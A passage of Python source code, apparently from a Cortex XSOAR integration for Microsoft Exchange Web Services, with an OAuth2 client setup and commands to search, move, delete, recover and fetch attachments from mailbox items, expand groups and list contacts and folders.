self.protocol = BaseProtocol(self.config)
def __prepare(self, insecure):
"""
Prepares the client PROTOCOL, CREDENTIALS and CONFIGURATION
:param insecure: Trust any certificate (not secure)
:return: OAuth 2 Configuration
"""
BaseProtocol.HTTP_ADAPTER_CLS = InsecureProxyAdapter if insecure else ProxyAdapter
access_token = self.ms_client.get_access_token()
oauth2_token = OAuth2Token({"access_token": access_token})
self.credentials = credentials = OAuth2AuthorizationCodeCredentials(
client_id=self.client_id,
client_secret=self.client_secret,
access_token=oauth2_token,
)
# need to add identity for protocol OAuth header
self.credentials.identity = Identity(upn=self.account_email)
config_args = {
"credentials": credentials,
"auth_type": OAUTH2,
"version": Version(EXCHANGE_O365),
"service_endpoint": "https://outlook.office365.com/EWS/Exchange.asmx",
}
return Configuration(**config_args)
def get_account(self, target_mailbox=None):
"""
Request an account from EWS
:param (Optional) target_mailbox: Mailbox associated with the requested account
:return: exchangelib Account
"""
if not target_mailbox:
target_mailbox = self.account_email
return Account(
primary_smtp_address=target_mailbox,
autodiscover=False,
config=self.config,
access_type=self.access_type,
)
def get_items_from_mailbox(self, account, item_ids):
"""
Request specific items from a mailbox associated with an account
:param account: EWS account or target_mailbox associated with that account
:param item_ids: item_ids of the requested items
:return: list of exchangelib Items
"""
# allow user to pass target_mailbox as account
if isinstance(account, str):
account = self.get_account(account)
else:
account = self.get_account(self.account_email)
if type(item_ids) is not list:
item_ids = [item_ids]
items = [Item(id=x) for x in item_ids]
result = list(account.fetch(ids=items))
result = [x for x in result if not isinstance(x, ErrorItemNotFound)]
if len(result) != len(item_ids):
raise Exception(
"One or more items were not found. Check the input item ids"
)
return result
def get_item_from_mailbox(self, account, item_id):
"""
Request a single item from a mailbox associated with an account
:param account: EWS account or target_mailbox associated with that account
:param item_id: item_id of the requested item
:return: exchangelib Item
"""
result = self.get_items_from_mailbox(account, [item_id])
if len(result) == 0:
raise Exception(f"ItemId {str(item_id)} not found")
return result[0]
def get_attachments_for_item(self, item_id, account, attachment_ids=None):
"""
Request attachments for an item
:param item_id: item_id of the item to retrieve attachments from
:param account: EWS account or target_mailbox associated with that account
        :param (Optional) attachment_ids: attachment_ids to retrieve
:return: list of exchangelib Item.attachments
"""
item = self.get_item_from_mailbox(account, item_id)
attachments = []
attachment_ids = argToList(attachment_ids)
if item:
if item.attachments:
for attachment in item.attachments:
if (
attachment_ids
and attachment.attachment_id.id not in attachment_ids
):
continue
attachments.append(attachment)
else:
raise Exception("Message item not found: " + item_id)
if attachment_ids and len(attachments) < len(attachment_ids):
raise Exception(
"Some attachment id did not found for message:" + str(attachment_ids)
)
return attachments
def is_default_folder(self, folder_path, is_public=None):
"""
Is the given folder_path public
:param folder_path: folder path to check if is public
:param is_public: (Optional) if provided, will return this value
:return: Boolean
"""
if is_public is not None:
return is_public
if folder_path == self.folder_name:
return self.is_public_folder
return False
def get_folder_by_path(self, path, account=None, is_public=False):
"""
Retrieve folder by path
:param path: path of the folder
:param account: account associated with the requested path
:param is_public: is the requested folder public
:return: exchangelib Folder
"""
if account is None:
account = self.get_account()
# handle exchange folder id
if len(path) == FOLDER_ID_LEN:
folders_map = account.root._folders_map
if path in folders_map:
return account.root._folders_map[path]
if is_public:
folder_result = account.public_folders_root
elif path == "AllItems":
folder_result = account.root
else:
folder_result = account.inbox.parent # Top of Information Store
path = path.replace("/", "\\")
path = path.split("\\")
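# Walk the requested path one level at a time; folder name matching is case-insensitive on the display name.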
for sub_folder_name in path:
folder_filter_by_name = [
x
for x in folder_result.children
if x.name.lower() == sub_folder_name.lower()
]
if len(folder_filter_by_name) == 0:
raise Exception(f"No such folder {path}")
folder_result = folder_filter_by_name[0]
return folder_result
def send_email(self, message: Message):
account = self.get_account()
message.account = account
message.send_and_save()
class MarkAsJunk(EWSAccountService):
"""
EWSAccountService class used for marking items as junk
"""
SERVICE_NAME = "MarkAsJunk"
def call(self, item_id, move_item):
elements = list(
self._get_elements(
payload=self.get_payload(item_id=item_id, move_item=move_item)
)
)
for element in elements:
if isinstance(element, ResponseMessageError):
return str(element)
return "Success"
def get_payload(self, item_id, move_item):
junk = create_element(
f"m:{self.SERVICE_NAME}",
{"IsJunk": "true", "MoveItem": "true" if move_item else "false"},
)
items_list = create_element("m:ItemIds")
item_element = create_element("t:ItemId", {"Id": item_id})
items_list.append(item_element)
junk.append(items_list)
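# The payload built above corresponds roughly to:
# <m:MarkAsJunk IsJunk="true" MoveItem="..."><m:ItemIds><t:ItemId Id="..."/></m:ItemIds></m:MarkAsJunk>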
return junk
class GetSearchableMailboxes(EWSService):
"""
EWSService class used for getting searchable mailboxes
"""
SERVICE_NAME = "GetSearchableMailboxes"
element_container_name = f"{{{MNS}}}SearchableMailboxes"
@staticmethod
def parse_element(element):
return {
MAILBOX: element.find(f"{{{TNS}}}PrimarySmtpAddress").text
if element.find(f"{{{TNS}}}PrimarySmtpAddress") is not None
else None,
MAILBOX_ID: element.find(f"{{{TNS}}}ReferenceId").text
if element.find(f"{{{TNS}}}ReferenceId") is not None
else None,
"displayName": element.find(f"{{{TNS}}}DisplayName").text
if element.find(f"{{{TNS}}}DisplayName") is not None
else None,
"isExternal": element.find(f"{{{TNS}}}IsExternalMailbox").text
if element.find(f"{{{TNS}}}IsExternalMailbox") is not None
else None,
"externalEmailAddress": element.find(f"{{{TNS}}}ExternalEmailAddress").text
if element.find(f"{{{TNS}}}ExternalEmailAddress") is not None
else None,
}
def call(self):
elements = self._get_elements(payload=self.get_payload())
return [
self.parse_element(x)
for x in elements
if x.find(f"{{{TNS}}}ReferenceId").text
]
def get_payload(self):
element = create_element(f"m:{self.SERVICE_NAME}")
return element
class ExpandGroup(EWSService):
"""
EWSService class used for expanding distribution groups
"""
SERVICE_NAME = "ExpandDL"
element_container_name = f"{{{MNS}}}DLExpansion"
@staticmethod
def parse_element(element):
return {
MAILBOX: element.find(f"{{{TNS}}}EmailAddress").text
if element.find(f"{{{TNS}}}EmailAddress") is not None
else None,
"displayName": element.find(f"{{{TNS}}}Name").text
if element.find(f"{{{TNS}}}Name") is not None
else None,
"mailboxType": element.find(f"{{{TNS}}}MailboxType").text
if element.find(f"{{{TNS}}}MailboxType") is not None
else None,
}
def call(self, email_address, recursive_expansion=False):
try:
if recursive_expansion == "True":
group_members: Dict = {}
self.expand_group_recursive(email_address, group_members)
return list(group_members.values())
else:
return self.expand_group(email_address)
except ErrorNameResolutionNoResults:
demisto.results("No results were found.")
sys.exit()
def get_payload(self, email_address):
element = create_element(f"m:{self.SERVICE_NAME}")
mailbox_element = create_element("m:Mailbox")
add_xml_child(mailbox_element, "t:EmailAddress", email_address)
element.append(mailbox_element)
return element
def expand_group(self, email_address):
"""
Expand given group
:param email_address: email address of the group to expand
:return: list of dicts with parsed expanded group data
"""
elements = self._get_elements(payload=self.get_payload(email_address))
return [self.parse_element(x) for x in elements]
def expand_group_recursive(self, email_address, non_dl_emails, dl_emails=None):
"""
Expand group recursively
:param email_address: email address of the group to expand
:param non_dl_emails: dict of non-DL member emails collected so far (populated in place)
:param dl_emails: (Optional) set of DL addresses that were already expanded
:return: None. Results are returned via the non_dl_emails / dl_emails references
"""
if dl_emails is None:
dl_emails = set()
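# Addresses already seen in either collection are skipped, which de-duplicates members and protects against circular DL references.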
if email_address in non_dl_emails or email_address in dl_emails:
return None
dl_emails.add(email_address)
for member in self.expand_group(email_address):
if (
member["mailboxType"] == "PublicDL"
or member["mailboxType"] == "PrivateDL"
):
self.expand_group_recursive(member.get("mailbox"), non_dl_emails, dl_emails)
else:
if member["mailbox"] not in non_dl_emails:
non_dl_emails[member["mailbox"]] = member
# If you are modifying this, you probably also need to modify it in other files
def exchangelib_cleanup():
key_protocols = list(exchangelib.protocol.CachingProtocol._protocol_cache.items())
try:
exchangelib.close_connections()
except Exception as ex:
demisto.error("Error was found in exchangelib cleanup, ignoring: {}".format(ex))
for key, protocol in key_protocols:
try:
if "thread_pool" in protocol.__dict__:
demisto.debug(
"terminating thread pool key{} id: {}".format(
key, id(protocol.thread_pool)
)
)
protocol.thread_pool.terminate()
del protocol.__dict__["thread_pool"]
else:
demisto.info(
"Thread pool not found (ignoring terminate) in protcol dict: {}".format(
dir(protocol.__dict__)
)
)
except Exception as ex:
demisto.error("Error with thread_pool.terminate, ignoring: {}".format(ex))
""" LOGGING """
log_stream = None
log_handler = None
def start_logging():
global log_stream
global log_handler
logging.raiseExceptions = False
if log_stream is None:
log_stream = StringIO()
log_handler = logging.StreamHandler(stream=log_stream)
log_handler.setFormatter(logging.Formatter(logging.BASIC_FORMAT))
logger = logging.getLogger()
logger.addHandler(log_handler)
logger.setLevel(logging.DEBUG)
""" Helper Functions """
def get_attachment_name(attachment_name):
"""
Retrieve attachment name or error string if none is provided
:param attachment_name: attachment name to retrieve
:return: string
"""
if attachment_name is None or attachment_name == "":
return "demisto_untitled_attachment"
return attachment_name
def get_entry_for_object(title, context_key, obj, headers=None):
"""
Create an entry for a given object
:param title: Title of the human readable
:param context_key: Context key used for entry context
:param obj: Object to create entry for
:param headers: (Optional) headers used in the tableToMarkDown
:return: Entry object to be used with demisto.results()
"""
if len(obj) == 0:
return "There is no output results"
if headers and isinstance(obj, dict):
headers = list(set(headers).intersection(set(obj.keys())))
return {
"Type": entryTypes["note"],
"Contents": obj,
"ContentsFormat": formats["json"],
"ReadableContentsFormat": formats["markdown"],
"HumanReadable": tableToMarkdown(title, obj, headers),
"EntryContext": {context_key: obj},
}
def prepare_args(args):
"""
Prepare arguments to be used as the API expects it
:param args: demisto args
:return: transformed args
"""
args = dict((k.replace("-", "_"), v) for k, v in list(args.items()))
if "is_public" in args:
args["is_public"] = args["is_public"] == "True"
return args
def get_limited_number_of_messages_from_qs(qs, limit):
"""
Retrieve a limited number of messages from query search
:param qs: query search to execute
:param limit: limit on number of items to retrieve from search
:return: list of exchangelib.Message
"""
count = 0
results = []
for item in qs:
if count == limit:
break
if isinstance(item, Message):
count += 1
results.append(item)
return results
def keys_to_camel_case(value):
"""
Transform keys from snake to camel case (does nothing if no snakes are found)
:param value: value to transform
:return: transformed value
"""
def str_to_camel_case(snake_str):
components = snake_str.split("_")
return components[0] + "".join(x.title() for x in components[1:])
if value is None:
return None
if isinstance(value, (list, set)):
return list(map(keys_to_camel_case, value))
if isinstance(value, dict):
return dict(
(
keys_to_camel_case(k),
keys_to_camel_case(v) if isinstance(v, (list, dict)) else v,
)
for (k, v) in list(value.items())
)
return str_to_camel_case(value)
def get_last_run(client: EWSClient, last_run=None):
"""
Retrieve the last run time
:param client: EWS Client
:param last_run: (Optional) last run object
:return: last run dict
"""
if not last_run or last_run.get(LAST_RUN_FOLDER) != client.folder_name:
last_run = {
LAST_RUN_TIME: None,
LAST_RUN_FOLDER: client.folder_name,
LAST_RUN_IDS: [],
}
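# The stored timestamp is a string; convert it back to EWSDateTime so it can be compared against item fields.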
if LAST_RUN_TIME in last_run and last_run[LAST_RUN_TIME] is not None:
last_run[LAST_RUN_TIME] = EWSDateTime.from_string(last_run[LAST_RUN_TIME])
# In case we have existing last_run data
if last_run.get(LAST_RUN_IDS) is None:
last_run[LAST_RUN_IDS] = []
return last_run
def email_ec(item):
"""
Create entry context for an email
:param item: exchangelib.Item
:return: entry context dict
"""
return {
"CC": None
if not item.cc_recipients
else [mailbox.email_address for mailbox in item.cc_recipients],
"BCC": None
if not item.bcc_recipients
else [mailbox.email_address for mailbox in item.bcc_recipients],
"To": None
if not item.to_recipients
else [mailbox.email_address for mailbox in item.to_recipients],
"From": item.author.email_address,
"Subject": item.subject,
"Text": item.text_body,
"HTML": item.body,
"HeadersMap": {header.name: header.value for header in item.headers},
}
def parse_item_as_dict(item, email_address=None, camel_case=False, compact_fields=False):
"""
Parses an exchangelib item as a dict
:param item: exchangelib.Item to parse
:param (Optional) email_address: string mailbox
:param (Optional) camel_case: Is camel case
:param (Optional) compact_fields: Is compact fields
:return: Item as a dict
"""
def parse_object_as_dict(obj):
raw_dict = {}
if obj is not None:
for field in obj.FIELDS:
raw_dict[field.name] = getattr(obj, field.name, None)
return raw_dict
def parse_folder_as_json(folder):
raw_dict = parse_object_as_dict(folder)
if "parent_folder_id" in raw_dict:
raw_dict["parent_folder_id"] = parse_folder_as_json(
raw_dict["parent_folder_id"]
)
if "effective_rights" in raw_dict:
raw_dict["effective_rights"] = parse_object_as_dict(
raw_dict["effective_rights"]
)
return raw_dict
raw_dict = {}
for field, value in item._field_vals():
if type(value) in [str, int, float, bool, Body, HTMLBody]:
raw_dict[field] = value
raw_dict["id"] = item.id
if getattr(item, "attachments", None):
raw_dict["attachments"] = [
parse_attachment_as_dict(item.id, x) for x in item.attachments
]
for time_field in [
"datetime_sent",
"datetime_created",
"datetime_received",
"last_modified_time",
"reminder_due_by",
]:
value = getattr(item, time_field, None)
if value:
raw_dict[time_field] = value.ewsformat()
for dict_field in [
"effective_rights",
"parent_folder_id",
"conversation_id",
"author",
"extern_id",
"received_by",
"received_representing",
"reply_to",
"sender",
"folder",
]:
value = getattr(item, dict_field, None)
if value:
if isinstance(value, list):
raw_dict[dict_field] = []
for single_val in value:
raw_dict[dict_field].append(parse_object_as_dict(single_val))
else:
raw_dict[dict_field] = parse_object_as_dict(value)
for list_dict_field in ["headers", "cc_recipients", "to_recipients"]:
value = getattr(item, list_dict_field, None)
if value:
raw_dict[list_dict_field] = [parse_object_as_dict(x) for x in value]
if getattr(item, "folder", None):
raw_dict["folder"] = parse_folder_as_json(item.folder)
folder_path = (
item.folder.absolute[len(TOIS_PATH):]
if item.folder.absolute.startswith(TOIS_PATH)
else item.folder.absolute
)
raw_dict["folder_path"] = folder_path
if compact_fields:
new_dict = {}
# noinspection PyListCreation
fields_list = [
"datetime_created",
"datetime_received",
"datetime_sent",
"sender",
"has_attachments",
"importance",
"message_id",
"last_modified_time",
"size",
"subject",
"text_body",
"headers",
"body",
"folder_path",
"is_read",
]
if "id" in raw_dict:
new_dict["itemId"] = raw_dict["id"]
fields_list.append("itemId")
for field in fields_list:
if field in raw_dict:
new_dict[field] = raw_dict.get(field)
for field in ["received_by", "author", "sender"]:
if field in raw_dict:
new_dict[field] = raw_dict.get(field, {}).get("email_address")
for field in ["to_recipients"]:
if field in raw_dict:
new_dict[field] = [x.get("email_address") for x in raw_dict[field]]
attachments = raw_dict.get("attachments")
if attachments and len(attachments) > 0:
file_attachments = [
x for x in attachments if x[ATTACHMENT_TYPE] == FILE_ATTACHMENT_TYPE
]
if len(file_attachments) > 0:
new_dict["FileAttachments"] = file_attachments
item_attachments = [
x for x in attachments if x[ATTACHMENT_TYPE] == ITEM_ATTACHMENT_TYPE
]
if len(item_attachments) > 0:
new_dict["ItemAttachments"] = item_attachments
raw_dict = new_dict
if camel_case:
raw_dict = keys_to_camel_case(raw_dict)
if email_address:
raw_dict[MAILBOX] = email_address
return raw_dict
def get_entry_for_file_attachment(item_id, attachment):
"""
Creates a file entry for an attachment
:param item_id: item_id of the attachment
:param attachment: attachment dict
:return: file entry dict for attachment
"""
entry = fileResult(get_attachment_name(attachment.name), attachment.content)
entry["EntryContext"] = {
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT
+ CONTEXT_UPDATE_FILE_ATTACHMENT: parse_attachment_as_dict(item_id, attachment)
}
return entry
def parse_attachment_as_dict(item_id, attachment):
"""
Creates a note entry for an attachment
:param item_id: item_id of the attachment
:param attachment: attachment dict
:return: note entry dict for attachment
"""
try:
attachment_content = (
attachment.content
if isinstance(attachment, FileAttachment)
else attachment.item.mime_content
)
return {
ATTACHMENT_ORIGINAL_ITEM_ID: item_id,
ATTACHMENT_ID: attachment.attachment_id.id,
"attachmentName": get_attachment_name(attachment.name),
"attachmentSHA256": hashlib.sha256(attachment_content).hexdigest()
if attachment_content
else None,
"attachmentContentType": attachment.content_type,
"attachmentContentId": attachment.content_id,
"attachmentContentLocation": attachment.content_location,
"attachmentSize": attachment.size,
"attachmentLastModifiedTime": attachment.last_modified_time.ewsformat(),
"attachmentIsInline": attachment.is_inline,
ATTACHMENT_TYPE: FILE_ATTACHMENT_TYPE
if isinstance(attachment, FileAttachment)
else ITEM_ATTACHMENT_TYPE,
}
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
return {
ATTACHMENT_ORIGINAL_ITEM_ID: item_id,
ATTACHMENT_ID: attachment.attachment_id.id,
"attachmentName": get_attachment_name(attachment.name),
"attachmentSHA256": None,
"attachmentContentType": attachment.content_type,
"attachmentContentId": attachment.content_id,
"attachmentContentLocation": attachment.content_location,
"attachmentSize": attachment.size,
"attachmentLastModifiedTime": attachment.last_modified_time.ewsformat(),
"attachmentIsInline": attachment.is_inline,
ATTACHMENT_TYPE: FILE_ATTACHMENT_TYPE
if isinstance(attachment, FileAttachment)
else ITEM_ATTACHMENT_TYPE,
}
def get_entry_for_item_attachment(item_id, attachment, target_email):
"""
Creates a note entry for an item attachment
:param item_id: Item id
:param attachment: exchangelib attachment
:param target_email: target email
:return: note entry dict for item attachment
"""
item = attachment.item
dict_result = parse_attachment_as_dict(item_id, attachment)
dict_result.update(
parse_item_as_dict(item, target_email, camel_case=True, compact_fields=True)
)
title = f'EWS get attachment got item for "{target_email}", "{get_attachment_name(attachment.name)}"'
return get_entry_for_object(
title,
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT + CONTEXT_UPDATE_ITEM_ATTACHMENT,
dict_result,
)
""" Command Functions """
def get_expanded_group(client: EWSClient, email_address, recursive_expansion=False):
"""
Retrieve expanded group command
:param client: EWS Client
:param email_address: Email address of the group to expand
:param (Optional) recursive_expansion: Whether to enable recursive expansion. Default is "False".
:return: Expanded groups output tuple
"""
group_members = ExpandGroup(protocol=client.protocol).call(
email_address, recursive_expansion
)
group_details = {"name": email_address, "members": group_members}
output = {"EWS.ExpandGroup": group_details}
readable_output = tableToMarkdown("Group Members", group_members)
return readable_output, output, group_details
def get_searchable_mailboxes(client: EWSClient):
"""
Retrieve searchable mailboxes command
:param client: EWS Client
:return: Searchable mailboxes output tuple
"""
searchable_mailboxes = GetSearchableMailboxes(protocol=client.protocol).call()
readable_output = tableToMarkdown(
"Searchable mailboxes", searchable_mailboxes, headers=["displayName", "mailbox"]
)
output = {"EWS.Mailboxes": searchable_mailboxes}
return readable_output, output, searchable_mailboxes
def delete_attachments_for_message(
client: EWSClient, item_id, target_mailbox=None, attachment_ids=None
):
"""
Deletes attachments for a given message
:param client: EWS Client
:param item_id: item id
:param (Optional) target_mailbox: target mailbox
:param (Optional) attachment_ids: attachment ids to delete
:return: entries that were deleted
"""
attachments = client.get_attachments_for_item(
item_id, target_mailbox, attachment_ids
)
deleted_file_attachments = []
deleted_item_attachments = [] # type: ignore
for attachment in attachments:
attachment_deleted_action = {
ATTACHMENT_ID: attachment.attachment_id.id,
ACTION: "deleted",
}
if isinstance(attachment, FileAttachment):
deleted_file_attachments.append(attachment_deleted_action)
else:
deleted_item_attachments.append(attachment_deleted_action)
attachment.detach()
entries = []
if len(deleted_file_attachments) > 0:
entry = get_entry_for_object(
"Deleted file attachments",
"EWS.Items" + CONTEXT_UPDATE_FILE_ATTACHMENT,
deleted_file_attachments,
)
entries.append(entry)
if len(deleted_item_attachments) > 0:
entry = get_entry_for_object(
"Deleted item attachments",
"EWS.Items" + CONTEXT_UPDATE_ITEM_ATTACHMENT,
deleted_item_attachments,
)
entries.append(entry)
return entries
def fetch_attachments_for_message(
client: EWSClient, item_id, target_mailbox=None, attachment_ids=None
):
"""
Fetches attachments for a message
:param client: EWS Client
:param item_id: item id
:param (Optional) target_mailbox: target mailbox
:param (Optional) attachment_ids: attachment ids
:return: list of parsed entries
"""
account = client.get_account(target_mailbox)
attachments = client.get_attachments_for_item(item_id, account, attachment_ids)
entries = []
for attachment in attachments:
if isinstance(attachment, FileAttachment):
try:
if attachment.content:
entries.append(get_entry_for_file_attachment(item_id, attachment))
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
else:
entries.append(
get_entry_for_item_attachment(
item_id, attachment, account.primary_smtp_address
)
)
if attachment.item.mime_content:
entries.append(
fileResult(
get_attachment_name(attachment.name) + ".eml",
attachment.item.mime_content,
)
)
return entries
def move_item_between_mailboxes(
client: EWSClient,
item_id,
destination_mailbox,
destination_folder_path,
source_mailbox=None,
is_public=None,
):
"""
Moves item between mailboxes
:param client: EWS Client
:param item_id: item id
:param destination_mailbox: destination mailbox
:param destination_folder_path: destination folder path
:param (Optional) source_mailbox: source mailbox
:param (Optional) is_public: is the destination folder public
:return: Output tuple
"""
source_account = client.get_account(source_mailbox)
destination_account = client.get_account(destination_mailbox)
is_public = client.is_default_folder(destination_folder_path, is_public)
destination_folder = client.get_folder_by_path(
destination_folder_path, destination_account, is_public
)
item = client.get_item_from_mailbox(source_account, item_id)
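# Cross-mailbox moves are done as export -> upload -> delete, since an item cannot be moved directly between two accounts.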
exported_items = source_account.export([item])
destination_account.upload([(destination_folder, exported_items[0])])
source_account.bulk_delete([item])
move_result = {
MOVED_TO_MAILBOX: destination_mailbox,
MOVED_TO_FOLDER: destination_folder_path,
}
readable_output = "Item was moved successfully."
output = {f"EWS.Items(val.itemId === '{item_id}')": move_result}
return readable_output, output, move_result
def move_item(
client: EWSClient, item_id, target_folder_path, target_mailbox=None, is_public=None
):
"""
Moves an item within the same mailbox
:param client: EWS Client
:param item_id: item id
:param target_folder_path: target folder path
:param (Optional) target_mailbox: mailbox containing the item
:param (Optional) is_public: is the destination folder public
:return: Output tuple
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(target_folder_path, is_public)
target_folder = client.get_folder_by_path(target_folder_path, is_public=is_public)
item = client.get_item_from_mailbox(account, item_id)
if isinstance(item, ErrorInvalidIdMalformed):
raise Exception("Item not found")
item.move(target_folder)
move_result = {
NEW_ITEM_ID: item.id,
ITEM_ID: item_id,
MESSAGE_ID: item.message_id,
ACTION: "moved",
}
readable_output = tableToMarkdown("Moved items", move_result)
output = {CONTEXT_UPDATE_EWS_ITEM: move_result}
return readable_output, output, move_result
def delete_items(client: EWSClient, item_ids, delete_type, target_mailbox=None):
"""
Delete items in a mailbox
:param client: EWS Client
:param item_ids: items ids to delete
:param delete_type: delete type: trash/soft/hard
:param (Optional) target_mailbox: mailbox containing the items
:return: Output tuple
"""
deleted_items = []
item_ids = argToList(item_ids)
items = client.get_items_from_mailbox(target_mailbox, item_ids)
delete_type = delete_type.lower()
for item in items:
item_id = item.id
if delete_type == "trash":
item.move_to_trash()
elif delete_type == "soft":
item.soft_delete()
elif delete_type == "hard":
item.delete()
else:
raise Exception(
f'Invalid delete type: {delete_type}. Use "trash", "soft" or "hard"'
)
deleted_items.append(
{
ITEM_ID: item_id,
MESSAGE_ID: item.message_id,
ACTION: f"{delete_type}-deleted",
}
)
readable_output = tableToMarkdown(
f"Deleted items ({delete_type} delete type)", deleted_items
)
output = {CONTEXT_UPDATE_EWS_ITEM: deleted_items}
return readable_output, output, deleted_items
def search_items_in_mailbox(
client: EWSClient,
query=None,
message_id=None,
folder_path="",
limit=100,
target_mailbox=None,
is_public=None,
selected_fields="all",
):
"""
Search items in mailbox
:param client: EWS Client
:param (Optional) query: query to execute
:param (Optional) message_id: message ids to search
:param (Optional) folder_path: folder path to search
:param (Optional) limit: max amount of items to fetch
:param (Optional) target_mailbox: mailbox containing the items
:param (Optional) is_public: is the targeted folder public
:param (Optional) selected_fields: Selected fields
:return: Output tuple
"""
if not query and not message_id:
return_error("Missing required argument. Provide query or message-id")
if message_id and message_id[0] != "<" and message_id[-1] != ">":
message_id = "<{}>".format(message_id)
account = client.get_account(target_mailbox)
limit = int(limit)
if folder_path.lower() == "inbox":
folders = [account.inbox]
elif folder_path:
is_public = client.is_default_folder(folder_path, is_public)
folders = [client.get_folder_by_path(folder_path, account, is_public)]
else:
folders = account.inbox.parent.walk() # pylint: disable=E1101
items = [] # type: ignore
selected_all_fields = selected_fields == "all"
if selected_all_fields:
restricted_fields = list([x.name for x in Message.FIELDS]) # type: ignore
else:
restricted_fields = set(argToList(selected_fields)) # type: ignore
restricted_fields.update(["id", "message_id"]) # type: ignore
for folder in folders:
if Message not in folder.supported_item_models:
continue
if query:
items_qs = folder.filter(query).only(*restricted_fields)
else:
items_qs = folder.filter(message_id=message_id).only(*restricted_fields)
items += get_limited_number_of_messages_from_qs(items_qs, limit)
if len(items) >= limit:
break
items = items[:limit]
searched_items_result = [
parse_item_as_dict(
item,
account.primary_smtp_address,
camel_case=True,
compact_fields=selected_all_fields,
)
for item in items
]
if not selected_all_fields:
searched_items_result = [
{k: v for (k, v) in i.items() if k in keys_to_camel_case(restricted_fields)}
for i in searched_items_result
]
for item in searched_items_result:
item["itemId"] = item.pop("id", "")
readable_output = tableToMarkdown(
"Searched items",
searched_items_result,
headers=ITEMS_RESULTS_HEADERS if selected_all_fields else None,
)
output = {CONTEXT_UPDATE_EWS_ITEM: searched_items_result}
return readable_output, output, searched_items_result
def get_out_of_office_state(client: EWSClient, target_mailbox=None):
"""
Retrieve get out of office state of the targeted mailbox
:param client: EWS Client
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
oof = account.oof_settings
oof_dict = {
"state": oof.state, # pylint: disable=E1101
"externalAudience": getattr(oof, "external_audience", None),
"start": oof.start.ewsformat() if oof.start else None, # pylint: disable=E1101
"end": oof.end.ewsformat() if oof.end else None, # pylint: disable=E1101
"internalReply": getattr(oof, "internal_replay", None),
"externalReply": getattr(oof, "external_replay", None),
MAILBOX: account.primary_smtp_address,
}
readable_output = tableToMarkdown(
f"Out of office state for {account.primary_smtp_address}", oof_dict
)
output = {f"Account.Email(val.Address == obj.{MAILBOX}).OutOfOffice": oof_dict}
return readable_output, output, oof_dict
def recover_soft_delete_item(
client: EWSClient,
message_ids,
target_folder_path="Inbox",
target_mailbox=None,
is_public=None,
):
"""
Recovers soft deleted items
:param client: EWS Client
:param message_ids: Message ids to recover
:param (Optional) target_folder_path: target folder path
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the target folder public
:return: Output tuple
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(target_folder_path, is_public)
target_folder = client.get_folder_by_path(target_folder_path, account, is_public)
recovered_messages = []
message_ids = argToList(message_ids)
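# Soft-deleted items live in the hidden recoverable items ("dumpster") folder; filter it by the original message ids.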
items_to_recover = account.recoverable_items_deletions.filter( # pylint: disable=E1101
message_id__in=message_ids
).all() # pylint: disable=E1101
recovered_items = set()
for item in items_to_recover:
recovered_items.add(item)
if len(recovered_items) != len(message_ids):
missing_items = set(message_ids).difference(recovered_items)
raise Exception(
f"Some message ids are missing in recoverable items directory: {missing_items}"
)
for item in recovered_items:
item.move(target_folder)
recovered_messages.append(
{ITEM_ID: item.id, MESSAGE_ID: item.message_id, ACTION: "recovered"}
)
readable_output = tableToMarkdown("Recovered messages", recovered_messages)
output = {CONTEXT_UPDATE_EWS_ITEM: recovered_messages}
return readable_output, output, recovered_messages
def get_contacts(client: EWSClient, limit, target_mailbox=None):
"""
Retrieve contacts of the target mailbox or client mailbox
:param client: EWS Client
:param limit: max amount of contacts to retrieve
:param (Optional) target_mailbox: Target mailbox
:return: Output tuple
"""
def parse_physical_address(address):
result = {}
for attr in ["city", "country", "label", "state", "street", "zipcode"]:
result[attr] = getattr(address, attr, None)
return result
def parse_phone_number(phone_number):
result = {}
for attr in ["label", "phone_number"]:
result[attr] = getattr(phone_number, attr, None)
return result
def parse_contact(contact):
contact_dict = dict(
(k, v if not isinstance(v, EWSDateTime) else v.ewsformat())
for k, v in list(contact._field_vals())
if isinstance(v, str) or isinstance(v, EWSDateTime)
)
if isinstance(contact, Contact) and contact.physical_addresses:
contact_dict["physical_addresses"] = list(
map(parse_physical_address, contact.physical_addresses)
)
if isinstance(contact, Contact) and contact.phone_numbers:
contact_dict["phone_numbers"] = list(
map(parse_phone_number, contact.phone_numbers)
)
if (
isinstance(contact, Contact)
and contact.email_addresses
and len(contact.email_addresses) > 0
):
contact_dict["emailAddresses"] = [x.email for x in contact.email_addresses]
contact_dict = keys_to_camel_case(contact_dict)
contact_dict = dict((k, v) for k, v in list(contact_dict.items()) if v)
contact_dict.pop("mimeContent", None)
contact_dict["originMailbox"] = target_mailbox
return contact_dict
account = client.get_account(target_mailbox)
contacts = []
for contact in account.contacts.all()[: int(limit)]: # pylint: disable=E1101
contacts.append(parse_contact(contact))
readable_output = tableToMarkdown(f"Email contacts for {target_mailbox}", contacts)
output = {"Account.Email(val.Address == obj.originMailbox).EwsContacts": contacts}
return readable_output, output, contacts
def create_folder(client: EWSClient, new_folder_name, folder_path, target_mailbox=None):
"""
Creates a folder in the target mailbox or the client mailbox
:param client: EWS Client
:param new_folder_name: new folder name
:param folder_path: path of the new folder
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
full_path = os.path.join(folder_path, new_folder_name)
try:
if client.get_folder_by_path(full_path, account):
return f"Folder {full_path} already exists",
except Exception:
pass
parent_folder = client.get_folder_by_path(folder_path, account)
f = Folder(parent=parent_folder, name=new_folder_name)
f.save()
client.get_folder_by_path(full_path, account)
return f"Folder {full_path} created successfully",
def find_folders(client: EWSClient, target_mailbox=None):
"""
Finds folders in the mailbox
:param client: EWS Client
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
root = account.root
if client.is_public_folder:
root = account.public_folders_root
folders = []
for f in root.walk(): # pylint: disable=E1101
folder = folder_to_context_entry(f)
folders.append(folder)
folders_tree = root.tree() # pylint: disable=E1101
readable_output = folders_tree
output = {"EWS.Folders(val.id == obj.id)": folders}
return readable_output, output, folders
def mark_item_as_junk(client: EWSClient, item_id, move_items, target_mailbox=None):
"""
Marks item as junk in the target mailbox or client mailbox
:param client: EWS Client
